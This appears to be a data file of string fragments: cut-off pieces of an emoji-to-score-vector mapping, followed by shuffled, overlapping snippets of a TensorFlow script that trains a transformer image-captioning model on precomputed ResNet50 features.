0.156, 0.182, 0.16699999999999998], \":pot_of_food:\":", "0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\":", "0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\":", "[0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244,", "0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\":", "0.183, 0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095],", "0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\":", "0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121,", "0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002,", "0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385,", "0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16,", "0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264,", 
"\":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18,", "0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115,", "[0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999,", "[0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109,", "0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185],", "[0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29,", "\":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196,", "0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132]," ]
[ "mask - This should just be 1's # input shape should be (batch_size,", "# tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus:", "# and 4H (4x768) as feedforward size # Small Model num_layers = 4", "# Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() #", "Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch", "self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self, step):", "-1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9,", "import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ##", "the decoder. # This padding mask is used to mask the encoder outputs.", "captions to images ######################### prefix = './data/' save_prefix = prefix + \"features/\" #", "= 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate = 0.1", "tqdm # our visual transformer code import visual_transformer as vt ####### GPU CONFIGS", "# Max length of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split()))", "You Need' paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model =", "100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {} Batch {} Loss", "# Use map to load the numpy files in parallel dataset = dataset.map(lambda", "# Visualize the schedule: uncomment to plot # import matplotlib.pyplot as plt #", "{:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} 
secs\\n'.format(time.time() -", "= inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization # tfds", "we only took half validation examples so we dont need to split #", "combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape: predictions, _ = transformer(inp,", "= inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set this as the max length", "arg1 = tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) *", "plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") #", "len(x.split())) # Max length of captions after tokenization # tfds demonstrated in earlier", "# Restrict TensorFlow to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0],", "the numpy files in parallel dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1,", "print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for", "tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in", "pad and mask future tokens in the input received by # the decoder.", "load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img, cap in", "from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import", "max_len: x = x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens']", "= 4 d_model = 128 dff = d_model * 4 num_heads 
= 8", "tokenized and padded/truncated\") # now to compute a column with the new name", "cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use", "in the decoder. # It is used to pad and mask future tokens", "train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train = img_names, captions #", "block in the decoder. # This padding mask is used to mask the", "enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer)", "= './data/' save_prefix = prefix + \"features/\" # for storing prefixes annot =", "transformer code import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU", "{:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {}", "Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we", "This should just be 1's # input shape should be (batch_size, 49, 2048)", "inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some prepared captions: \", inputs.tokenized[:5])", "# import matplotlib.pyplot as plt # temp_learning_rate_schedule = CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32)))", "= tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch", "Max length of captions split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) #", "from_logits=True, reduction='none') def loss_function(real, pred): mask = tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred)", "spaces lens 
= inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after tokenization", "x + [0] * int(max_len - len(x)) return x[:max_len] inputs['tokens'] = inputs.tokenized.map(lambda x:", "re import os import time import datetime from tqdm import tqdm # our", "gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for", "a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of", "of notebook state # chck if GPU can be seen by TF tf.config.list_physical_devices('GPU')", "12 layers, 768 as embedding dim, 12 attention heads # and 4H (4x768)", "len(logical_gpus), \"Logical GPU\") except RuntimeError as e: # Visible devices must be set", "embedding dim, 12 attention heads # and 4H (4x768) as feedforward size #", "the decoder. look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return", "new name of the saved image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix", "= prefix + \"features/\" # for storing prefixes annot = prefix + 'data.csv'", "vt.create_padding_mask(inp_seq) # Used in the 2nd attention block in the decoder. 
# This", "visual transformer code import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia", "Loops ######################### # setup training parameters BUFFER_SIZE = 1000 BATCH_SIZE = 64 #", "in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y", "np.load(img_name.decode('utf-8')) return img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load", "half validation examples so we dont need to split # img_train, img_val, cap_train,", "= tf.math.logical_not(tf.math.equal(real, 0)) loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *=", "complexity of the model # BERT (base) uses 12 layers, 768 as embedding", "combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path =", "increase depending on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE) dataset", "tensorflow_datasets as tfds import numpy as np import pandas as pd from sklearn.model_selection", "examples so we dont need to split # img_train, img_val, cap_train, cap_val =", "start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images, tar -> caption for", "vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask #", "enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\")", "tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used", "######################### # Training Setup ######################### # Learning Rate Schedule, as per `Attention is", "at {}'.format(epoch + 1, ckpt_save_path)) 
print('Epoch {} Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1,", "dont need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions,", "print(\"Tokenizer hydrated\") # Max length of captions split by spaces lens = inputs['caption'].map(lambda", "= vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup", "start/end tokens dropout_rate = 0.1 EPOCHS = 20 # should see results in", "file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor = np.load(img_name.decode('utf-8')) return img_tensor,", "Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch: {} secs\\n'.format(time.time()", "tensorflow as tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image", "in dataset.take(2): print(img.shape) print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model #########################", "will set this as the max length of captions # which cover 99%", "Epoch {} Batch {} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch,", "or increase depending on GPU capacity # Shuffle and batch dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE)", "train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm = time.time()", "pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 2nd attention", "notebook state # chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') #", "tfds import numpy as np import pandas as pd from sklearn.model_selection import train_test_split", "top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") # Max length of captions split by", "d_model = 128 dff = 
d_model * 4 num_heads = 8 # BERT", "\"Logical GPU\") except RuntimeError as e: # Visible devices must be set before", "loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_) / tf.reduce_sum(mask)", "dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints", "train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states()", "True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except", "(4x768) as feedforward size # Small Model num_layers = 4 d_model = 128", "out if not training on GPU ## ## this is important for running", "# Used in the 2nd attention block in the decoder. # This padding", "logical_gpus = tf.config.experimental.list_logical_devices('GPU') print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\") except RuntimeError as e:", "print(\"Captions tokenized and padded/truncated\") # now to compute a column with the new", "step of raining on one batch in an epoch @tf.function def train_step(inp, tar):", "used to mask the encoder outputs. 
dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the", "+ 'npy') ######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names", "train_accuracy.reset_states() # inp -> images, tar -> caption for (batch, (inp, tar)) in", "# Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name, cap): img_tensor", "on one batch in an epoch @tf.function def train_step(inp, tar): tar_inp = tar[:,", "= 128 dff = d_model * 4 num_heads = 8 # BERT Base", "12 # d_model = 768 # dff = d_model * 4 # as", "img_names, captions # Load the numpy file with extracted ResNet50 feature def load_image_feature(img_name,", "for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 ==", "checkpoint for epoch {} at {}'.format(epoch + 1, ckpt_save_path)) print('Epoch {} Loss {:.6f}", "2070/NVidia GPU ############### ## Please comment out if not training on GPU ##", "'data.csv' inputs = pd.read_csv(annot, header=None, names=[\"caption\", \"image\"]) print(\"Data file loaded\") ######################### # Tokenize", "self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def __call__(self,", "transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask) loss = loss_function(tar_real, predictions) gradients = tape.gradient(loss,", "dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify", "pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### # Learning Rate", "ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if a checkpoint", "= create_masks(inp, tar_inp) with tf.GradientTape() as 
tape: predictions, _ = transformer(inp, tar_inp, True,", "-> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch %", "{} Loss {:.6f} Accuracy {:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if", "per BERT paper # num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes", "data fits in memory lens = inputs['caption'].map(lambda x: len(cap_tokenizer.encode(x.lower()))) # We will set", "tar) if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch", "Max length of captions after tokenization # tfds demonstrated in earlier chapters #", "Loss {:.6f} Accuracy {:.6f}'.format(epoch + 1, train_loss.result(), train_accuracy.result())) print('Time taken for 1 epoch:", "to pad and mask future tokens in the input received by # the", "CustomSchedule(d_model) # # plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32))) # plt.ylabel(\"Learning Rate\") # plt.xlabel(\"Train Step\") ######################### #", "the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used in the 1st attention block", "# the decoder. 
look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)", "target_vocab_size, pe_input=49, # 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup", "look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask,", "= tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = \"./checkpoints/train-small-model-nope-20ep\"", "tar_inp = tar[:, :-1] tar_real = tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp,", "# num_heads = 12 target_vocab_size = cap_tokenizer.vocab_size # already includes start/end tokens dropout_rate", "'<s>' end = '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() +", "image feature file inputs['img_features'] = inputs['image'].map(lambda x: save_prefix + x.split('/')[-1][:-3] + 'npy') #########################", "we dont need to split # img_train, img_val, cap_train, cap_val = train_test_split(img_names, #", "######################### captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation", "predictions) gradients = tape.gradient(loss, transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training", "as feedforward size # Small Model num_layers = 4 d_model = 128 dff", "only to check GPU usage gpus = tf.config.experimental.list_physical_devices('GPU') if gpus: # Restrict TensorFlow", "49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used 
enc_padding_mask", "GPU ############### ## Please comment out if not training on GPU ## ##", "'./data/' save_prefix = prefix + \"features/\" # for storing prefixes annot = prefix", "def tokenize_pad(x): x = cap_tokenizer.encode(x) if len(x) < max_len: x = x +", "print(cap_tokenizer.encode(\"A man riding a wave on top of a surfboard.\".lower())) print(\"Tokenizer hydrated\") #", "cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A man riding a wave on top of a", "if a checkpoint exists, restore the latest checkpoint. if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint", "print(\"Data file loaded\") ######################### # Tokenize Captions ######################### cap_tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file( \"captions\") print(cap_tokenizer.encode(\"A", "import tensorflow_datasets as tfds import numpy as np import pandas as pd from", "Model ######################### # These parameters control the size and complexity of the model", "seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) # only to check GPU usage gpus", "for epoch in range(EPOCHS): start_tm = time.time() train_loss.reset_states() train_accuracy.reset_states() # inp -> images,", "x: len(x.split())) # Max length of captions after tokenization # tfds demonstrated in", "max_len = int(lens.quantile(0.99) + 1) # for special tokens start = '<s>' end", "dataset = dataset.map(lambda item1, item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) #", "loss_ = loss_object(real, pred) mask = tf.cast(mask, dtype=loss_.dtype) loss_ *= mask return tf.reduce_sum(loss_)", "on GPU ## ## this is important for running CuDNN on GPU ##", "tf.keras.backend.clear_session() # - for easy reset of notebook state # chck if GPU", "dataset.take(2): print(img.shape) 
print(cap.numpy()) print(\"Training dataset prepared.\") ######################### # Build Transformer Model ######################### #", "warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps", "print('Latest checkpoint restored!!') ######################### # Training Loops ######################### # setup training parameters BUFFER_SIZE", "the 2nd attention block in the decoder. # This padding mask is used", "dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch in", "# should see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads,", "img_tensor, cap dataset = tf.data.Dataset.from_tensor_slices((img_train, cap_train)) # Use map to load the numpy", "super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model = tf.cast(self.d_model, tf.float32) self.warmup_steps = warmup_steps def", "= \"./checkpoints/train-small-model-nope-20ep\" ckpt = tf.train.Checkpoint(transformer=transformer, optimizer=optimizer) ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5) # if", "as tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import", "tokens dropout_rate = 0.1 EPOCHS = 20 # should see results in 4-10", "EPOCHS = 20 # should see results in 4-10 epochs also transformer =", "######################### prefix = './data/' save_prefix = prefix + \"features/\" # for storing prefixes", "by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions after", "inp.shape[1]]) # all pixels to be used enc_padding_mask = vt.create_padding_mask(inp_seq) # Used in", "train_accuracy.result())) if (epoch + 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving", "be (batch_size, 49, 2048) 
inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be", "= 768 # dff = d_model * 4 # as per BERT paper", "img_train, img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train,", "'npy') ######################### # Prepare tf.DataSet for training ######################### captions = inputs.tokens.tolist() img_names =", "import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import numpy as", "# 7x7 pixels pe_target=target_vocab_size, rate=dropout_rate, use_pe=False ) ######################### # Training Setup ######################### #", "with tf.GradientTape() as tape: predictions, _ = transformer(inp, tar_inp, True, enc_padding_mask, combined_mask, dec_padding_mask)", "split by spaces lens = inputs['caption'].map(lambda x: len(x.split())) # Max length of captions", "Model num_layers = 4 d_model = 128 dff = d_model * 4 num_heads", "= 20 # should see results in 4-10 epochs also transformer = vt.Transformer(num_layers,", "decoder. 
look_ahead_mask = vt.create_look_ahead_mask(tf.shape(tar)[1]) dec_target_padding_mask = vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask,", "len(x) < max_len: x = x + [0] * int(max_len - len(x)) return", "Loss and Metrics loss_object = tf.keras.losses.SparseCategoricalCrossentropy( from_logits=True, reduction='none') def loss_function(real, pred): mask =", "+ 1) % 2 == 0: ckpt_save_path = ckpt_manager.save() print('Saving checkpoint for epoch", "img_val, cap_train, cap_val = train_test_split(img_names, # captions, # test_size=0.2, # random_state=42) img_train, cap_train", "from tensorflow.keras.preprocessing.image import img_to_array from tensorflow.keras.preprocessing.image import load_img import tensorflow_datasets as tfds import", "from tqdm import tqdm # our visual transformer code import visual_transformer as vt", "random_state=42) img_train, cap_train = img_names, captions # Load the numpy file with extracted", "should see results in 4-10 epochs also transformer = vt.Transformer(num_layers, d_model, num_heads, dff,", "# Max length of captions after tokenization # tfds demonstrated in earlier chapters", "be set before GPUs have been initialized print(e) ############################################### ######################### # Load Data", "learning_rate = CustomSchedule(d_model) optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9) # Visualize the schedule:", "(self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2) learning_rate = CustomSchedule(d_model) optimizer =", "sklearn.model_selection import train_test_split import json from glob import glob from PIL import Image", "= tar[:, 1:] enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp) with tf.GradientTape() as tape:", "+ end) print(\"Some prepared captions: \", inputs.tokenized[:5]) def tokenize_pad(x): x = cap_tokenizer.encode(x) if", 
"+ 1) # for special tokens start = '<s>' end = '</s>' inputs['tokenized']", "the max length of captions # which cover 99% of the captions without", "tar -> caption for (batch, (inp, tar)) in enumerate(dataset): train_step(inp, tar) if batch", "in the 2nd attention block in the decoder. # This padding mask is", "epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) % 2 ==", "import time import datetime from tqdm import tqdm # our visual transformer code", "# num_layers = 12 # d_model = 768 # dff = d_model *", "np import pandas as pd from sklearn.model_selection import train_test_split import json from glob", "mask is used to mask the encoder outputs. dec_padding_mask = vt.create_padding_mask(inp_seq) # Used", "transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS): start_tm =", "# chck if GPU can be seen by TF tf.config.list_physical_devices('GPU') # tf.debugging.set_log_device_placement(True) #", "item2: tf.numpy_function( load_image_feature, [item1, item2], [tf.float32, tf.int32]), num_parallel_calls=tf.data.experimental.AUTOTUNE) # To verify for img,", "Encoder padding mask - This should just be 1's # input shape should", "####### GPU CONFIGS FOR RTX 2070/NVidia GPU ############### ## Please comment out if", "It is used to pad and mask future tokens in the input received", "code import visual_transformer as vt ####### GPU CONFIGS FOR RTX 2070/NVidia GPU ###############", "= dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE) # Perform one step of raining on one batch in an", "captions = inputs.tokens.tolist() img_names = inputs.img_features.tolist() # we only took half validation examples", "this is important for running CuDNN on GPU ## tf.keras.backend.clear_session() # - for", "tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path = 
\"./checkpoints/train-small-model-nope-20ep\" ckpt", "+ x.split('/')[-1][:-3] + 'npy') ######################### # Prepare tf.DataSet for training ######################### captions =", "paper class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule): def __init__(self, d_model, warmup_steps=4000): super(CustomSchedule, self).__init__() self.d_model = d_model self.d_model", "if batch % 100 == 0: ts = datetime.datetime.now().strftime(\"%d-%b-%Y (%H:%M:%S)\") print('[{}] Epoch {}", "name='train_accuracy') ######################### # Helper function for creating masks def create_masks(inp, tar): # Encoder", "as tfds import numpy as np import pandas as pd from sklearn.model_selection import", "tar)) in enumerate(dataset): train_step(inp, tar) if batch % 100 == 0: ts =", "= '</s>' inputs['tokenized'] = inputs['caption'].map( lambda x: start + x.lower().strip() + end) print(\"Some", "comment out if not training on GPU ## ## this is important for", "exists, restore the latest checkpoint. 
if ckpt_manager.latest_checkpoint: ckpt.restore(ckpt_manager.latest_checkpoint) print('Latest checkpoint restored!!') ######################### #", "images ######################### prefix = './data/' save_prefix = prefix + \"features/\" # for storing", "768 # dff = d_model * 4 # as per BERT paper #", "model # BERT (base) uses 12 layers, 768 as embedding dim, 12 attention", ") ######################### # Training Setup ######################### # Learning Rate Schedule, as per `Attention", "tf.math.rsqrt(step) arg2 = step * (self.warmup_steps ** -1.5) return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)", "can reduce or increase depending on GPU capacity # Shuffle and batch dataset", "vt.create_padding_mask(tar) combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) return enc_padding_mask, combined_mask, dec_padding_mask # Checkpoints setup checkpoint_path", "{:.6f}'.format( ts, epoch + 1, batch, train_loss.result(), train_accuracy.result())) if (epoch + 1) %", "import tensorflow as tf from tensorflow.keras.applications.resnet50 import preprocess_input from tensorflow.keras.preprocessing.image import img_to_array from", "(batch_size, 49, 2048) inp_seq = tf.ones([inp.shape[0], inp.shape[1]]) # all pixels to be used", "is a quick way if data fits in memory lens = inputs['caption'].map(lambda x:", "transformer.trainable_variables) optimizer.apply_gradients(zip(gradients, transformer.trainable_variables)) train_loss(loss) train_accuracy(tar_real, predictions) # Begin Training for epoch in range(EPOCHS):", "our visual transformer code import visual_transformer as vt ####### GPU CONFIGS FOR RTX", "## tf.keras.backend.clear_session() # - for easy reset of notebook state # chck if", "e: # Visible devices must be set before GPUs have been initialized print(e)", "to only use the first GPU try: tf.config.experimental.set_memory_growth(gpus[0], True) tf.config.experimental.set_visible_devices(gpus[0], 'GPU') logical_gpus =", 
